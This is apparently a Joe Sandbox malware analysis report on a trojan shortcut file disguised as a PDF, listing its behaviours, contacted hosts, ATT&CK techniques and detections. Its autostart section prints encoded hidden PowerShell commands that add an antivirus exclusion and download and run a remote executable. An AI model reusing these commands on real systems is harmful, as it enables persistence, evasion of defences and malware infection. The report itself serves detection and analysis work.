Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: powershell.exe, 00000002.00000002.1832515372.000001F14F8C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: regedit.COM
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
41
Registry Run Keys / Startup Folder
11
Process Injection
111
Masquerading
OS Credential Dumping21
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts4
PowerShell
1
DLL Side-Loading
41
Registry Run Keys / Startup Folder
1
Modify Registry
LSASS Memory11
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
31
Virtualization/Sandbox Evasion
Security Account Manager31
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information
LSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Obfuscated Files or Information
Cached Domain Credentials21
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1385501 Sample: Document.pdf.lnk Startdate: 02/02/2024 Architecture: WINDOWS Score: 100 47 files.catbox.moe 2->47 53 Antivirus detection for URL or domain 2->53 55 Windows shortcut file (LNK) starts blacklisted processes 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 12 other signatures 2->59 10 powershell.exe 15 2->10         started        13 powershell.exe 10 2->13         started        15 powershell.exe 10 2->15         started        17 svchost.exe 1 1 2->17         started        signatures3 process4 dnsIp5 63 Windows shortcut file (LNK) starts blacklisted processes 10->63 65 Suspicious powershell command line found 10->65 67 Encrypted powershell cmdline option found 10->67 69 2 other signatures 10->69 20 powershell.exe 17 18 10->20         started        25 conhost.exe 1 10->25         started        27 conhost.exe 13->27         started        29 conhost.exe 15->29         started        45 127.0.0.1 unknown unknown 17->45 signatures6 process7 dnsIp8 49 files.catbox.moe 108.181.20.35, 443, 49729, 49730 ASN852CA Canada 20->49 43 C:\Users\Public\17399.reg, data 20->43 dropped 61 Potential dropper URLs found in powershell memory 20->61 31 regedit.exe 2 20->31         started        34 Acrobat.exe 79 20->34         started        36 conhost.exe 20->36         started        file9 signatures10 process11 signatures12 71 Creates autostart registry keys with suspicious values (likely registry only malware) 31->71 73 Creates multiple autostart registry keys 31->73 75 Creates an autostart registry key pointing to binary in C:\Windows 31->75 38 AcroCEF.exe 104 34->38         started        process13 process14 40 AcroCEF.exe 2 38->40         started        dnsIp15 51 184.25.164.138, 443, 49745 BBIL-APBHARTIAirtelLtdIN United States 40->51

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Document.pdf.lnk40%VirustotalBrowse
Document.pdf.lnk34%ReversingLabsShortcut.Trojan.Boxter
Document.pdf.lnk100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://oneget.orgX0%URL Reputationsafe
https://oneget.org0%URL Reputationsafe
http://crl.ver)0%Avira URL Cloudsafe
https://files.catbox.moe;0%Avira URL Cloudsafe
https://www.google.com;0%Avira URL Cloudsafe
http://raw.githubusercontent.com/MyPrincessAkira/Jarvas/main/Alej.exe0%Avira URL Cloudsafe
http://raw.githubusercontent.com/MyPrincessAkira/Jarvas/main/Alej.exe3%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
files.catbox.moe
108.181.20.35
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://files.catbox.moe/p1yr9i.pdffalse
      high
      http://files.catbox.moe/p1yr9i.pdffalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1777532455.00000223A62B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B491F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.1777532455.00000223A5D97000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1832515372.000001F14A589000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1832515372.000001F14A589000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://www.google.com;powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              low
              http://raw.githubusercontent.com/MyPrincessAkira/Jarvas/main/Alej.exepowershell.exe, 00000010.00000002.2014312932.000001BD00085000.00000004.00000800.00020000.00000000.sdmpfalse
              • 3%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://contoso.com/Iconpowershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://crl.ver)svchost.exe, 00000007.00000002.3021411348.000002A8ED800000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              low
              https://g.live.com/odclientsettings/ProdV2.C:edb.log.7.drfalse
                high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0powershell.exe, 0000000A.00000002.1948558880.00000248BB0BE000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1832515372.000001F14A589000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://files.catbox.moe;powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F1502DF000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    low
                    https://g.live.com/odclientsettings/Prod.C:edb.log.7.drfalse
                      high
                      https://www.google.compowershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://g.live.com/odclientsettings/ProdV2edb.log.7.drfalse
                          high
                          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000007.00000003.1842875761.000002A8EDAC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drfalse
                            high
                            https://contoso.com/powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1777532455.00000223A62B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B491F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1797633250.00000223B4A55000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://oneget.orgXpowershell.exe, 00000000.00000002.1777532455.00000223A5D97000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.1777532455.00000223A48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F14A361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1948558880.00000248BB09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1948558880.00000248BB087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2014312932.000001BD0004C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2014312932.000001BD0005E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://files.catbox.moepowershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F1502DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1777532455.00000223A48A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F14A361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2014312932.000001BD00085000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000007.00000003.1842875761.000002A8EDAC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                      high
                                      https://oneget.orgpowershell.exe, 00000000.00000002.1777532455.00000223A5D97000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://files.catbox.moepowershell.exe, 00000002.00000002.1832515372.000001F1502B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F14F8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1832515372.000001F150298000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        184.25.164.138
                                        unknownUnited States
                                        9498BBIL-APBHARTIAirtelLtdINfalse
                                        108.181.20.35
                                        files.catbox.moeCanada
                                        852ASN852CAfalse
                                        IP
                                        127.0.0.1
                                        Joe Sandbox version:39.0.0 Ruby
                                        Analysis ID:1385501
                                        Start date and time:2024-02-02 11:18:10 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 32s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:19
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:Document.pdf.lnk
                                        Detection:MAL
                                        Classification:mal100.rans.bank.troj.evad.winLNK@27/66@1/3
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 1
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .lnk
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.55.252.138, 23.34.82.7, 23.34.82.6, 34.193.227.236, 54.144.73.197, 107.22.247.231, 18.207.85.246, 172.64.41.3, 162.159.61.3, 23.55.253.34, 104.76.210.84, 104.76.210.69
                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net
                                        • Execution Graph export aborted for target powershell.exe, PID 5856 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        TimeTypeDescription
                                        10:19:15AutostartRun: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticHelper powershell -W Hidden -e JABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIAAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACAAfAAgAFMAcABsAGkAdAAtAFAAYQB0AGgAIAAtAFEAdQBhAGwAaQBmAGkAZQByACkAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlAFwA
                                        10:19:26AutostartRun: HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BatteryDiagnosticTool powershell -W Hidden -e JABhAD0AJwBoAHQAdABwADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBNAHkAUAByAGkAbgBjAGUAcwBzAEEAawBpAHIAYQAvAEoAYQByAHYAYQBzAC8AbQBhAGkAbgAvAEEAbABlAGoALgBlAHgAZQAnADsAJABkAD0AIgAkACgAJABlAG4AdgA6AFQARQBNAFAAKQBcAEIAYQB0AHQAZQByAHkARABpAGEAZwBuAG8AcwB0AGkAYwAiADsAaQBmACgALQBuAG8AdAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABkACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAewBOAGUAdwAtAEkAdABlAG0AIAAtAEkAdABlAG0AVAB5AHAAZQAgAEQAaQByAGUAYwB0AG8AcgB5ACAALQBQAGEAdABoACAAJABkAH0AOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABhACAALQBPAHUAdABGAGkAbABlACAAIgAkAGQAXABCAGEAdAB0AGUAcgB5AEQAaQBhAGcAbgBvAHMAdABpAGMAVABvAG8AbAAuAGUAeABlACIAOwAgAEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACIAJABkAFwAQgBhAHQAdABlAHIAeQBEAGkAYQBnAG4AbwBzAHQAaQBjAFQAbwBvAGwALgBlAHgAZQAiAA==
                                        11:19:11API Interceptor47x Sleep call for process: powershell.exe modified
                                        11:19:18API Interceptor2x Sleep call for process: svchost.exe modified
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        184.25.164.138https://alsic0-my.sharepoint.com/:f:/g/personal/jsilvia_cpstechnologysolutions_com/En-Hgk0yL4VImyHuKwgnw80BmpoigC0QGozVagwfZqj0Aw?e=0RSNMeGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                          https://hon6yh6idrd.jp.larksuite.com/file/XL9ZbeTkuoHibNxn4UrjSfvZpyhGet hashmaliciousUnknownBrowse
                                            https://5.imimg.com/data5/SELLER/Doc/2023/7/330406133/VU/SM/BB/194088754/61494960850.pdfGet hashmaliciousUnknownBrowse
                                              https://fileserver.aw.active.com/file-server/rest/files/3c6fee99-1aa6-464a-8861-48b911a21ebcGet hashmaliciousUnknownBrowse
                                                https://click.email.active.com/f/a/Rvw5U0zpMs80NePY5xp7sQ~~/AAOtGgA~/RgRnmuclP0R7aHR0cHM6Ly9jb21tdXNlcnVpLmFjdGl2ZS5jb20vY2xpY2svMS8xNzA4NzI3MzAzL2U0NTk5YTEzLWJhNjYtNDk2Ni1iYjlhLTRlMWFjNmFiMTBlNC9FRDI2QkE4RS1BRUE1LTQ5QkYtQjc5MC0wQTdEN0VCNzk5QkQvVwNzcGNCCmWxJWK4ZTYgoa9SFWdyZWcuZHlja2VAY2FsZ2FyeS5jYVgEAAAACw~~Get hashmaliciousUnknownBrowse
                                                  SecuriteInfo.com.Trojan.Win64.Agent.7400.23601.exeGet hashmaliciousUnknownBrowse
                                                    30a48010-0636-41b5-8a60-15ec97856221.zipGet hashmaliciousHTMLPhisherBrowse
                                                      Preventivo24.01.11.exeGet hashmaliciousUnknownBrowse
                                                        108.181.20.35SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                        • files.catbox.moe/nzct1p
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        files.catbox.moeGlobal_Industrial_Vendor_Wire_Remittance_Detail.com.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        Global_Industrial_Vendor_Wire_Remittance_Detail.com.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        Invoice_&_Packing_List.com.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        Invoice_&_Packing_List.com.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msiGet hashmaliciousLummaC StealerBrowse
                                                        • 108.181.20.35
                                                        Dunning-Notice-1016.com.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        Dunning-Notice-1016.com.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        hesaphareketi-01.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        hesaphareketi-01.exeGet hashmaliciousUnknownBrowse
                                                        • 108.181.20.35
                                                        CONTG._0992-19.docGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        • 108.181.20.35
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ASN852CAj2IGByK7Bt.elfGet hashmaliciousMiraiBrowse
                                                        • 104.205.199.0
                                                        bOadyQy9IT.elfGet hashmaliciousMiraiBrowse
                                                        • 209.89.133.180
                                                        huhu.x86_64.elfGet hashmaliciousMiraiBrowse
                                                        • 209.115.244.23
                                                        ObUU1dYiZQ.elfGet hashmaliciousMiraiBrowse
                                                        • 23.16.230.115
                                                        L3We5oYYzp.elfGet hashmaliciousMiraiBrowse
                                                        • 198.166.177.228
                                                        t3WYi23MYZ.elfGet hashmaliciousMiraiBrowse
                                                        • 75.158.188.27
                                                        SecuriteInfo.com.Trojan.Packed2.46190.15325.19908.exeGet hashmaliciousFormBookBrowse
                                                        • 108.181.107.138
                                                        https://rtfghvbnjkugfhcvb2.z13.web.core.windows.net/Win08ShDMeEr0887/index.html?phone=nullGet hashmaliciousTechSupportScamBrowse
                                                        • 108.181.98.179
                                                        Jv6tQ2Xibw.elfGet hashmaliciousMiraiBrowse
                                                        • 192.197.219.68
                                                        huhu.mips.elfGet hashmaliciousMiraiBrowse
                                                        • 209.171.79.15
                                                        BBIL-APBHARTIAirtelLtdINqQVtMCLrxN.elfGet hashmaliciousMiraiBrowse
                                                        • 182.76.13.187
                                                        stan.hunter@2sfg.com-Electronic Payment_Fax_Receipt_ATT00001#.file.htmlGet hashmaliciousHTMLPhisherBrowse
                                                        • 184.25.165.167
                                                        yCUczQYIGe.elfGet hashmaliciousMiraiBrowse
                                                        • 125.20.254.122
                                                        Create_Installer_PLC0000037_2024_English_WIN64.exeGet hashmaliciousUnknownBrowse
                                                        • 184.25.165.204
                                                        https://alsic0-my.sharepoint.com/:f:/g/personal/jsilvia_cpstechnologysolutions_com/En-Hgk0yL4VImyHuKwgnw80BmpoigC0QGozVagwfZqj0Aw?e=0RSNMeGet hashmaliciousHTMLPhisher, ReCaptcha PhishBrowse
                                                        • 184.25.164.138
                                                        Completed_ Complete via DocsShare -Signature Required- DocsID #Whelen_FXMA261445.emlGet hashmaliciousUnknownBrowse
                                                        • 23.209.188.145
                                                        3bR7M0wZ8L.elfGet hashmaliciousMiraiBrowse
                                                        • 61.95.175.15
                                                        https://www.edrawmax.com/online/share.html?code=235a0cc4c01511eeb72a0a951ba8b83dGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 23.209.188.198
                                                        https://www.edrawmax.com/online/share.html?code=235a0cc4c01511eeb72a0a951ba8b83dGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                        • 23.209.188.198
                                                        https://nam.safelink.emails.azure.net/redirect/?destination=https%3A%2F%2Fwww.microsoft.com%2Fworkplace-discount-program%3Ftoken%3D19c888ec-6402-49e1-a9ae-e189ed3e4cb9%26ocid%3Deml_OrganicEligibility_cons_officehup_acq_hup_poceligibility&p=bT1mNjU4NjMyYy0xNjE2LTRmNmMtODUyMy00NDI2YTllMzZiZjAmcz0wMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDAmdT1hZW8mbD13b3JrcGxhY2UtZGlzY291bnQtcHJvZ3JhbQ%3D%3DGet hashmaliciousUnknownBrowse
                                                        • 184.25.165.167
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
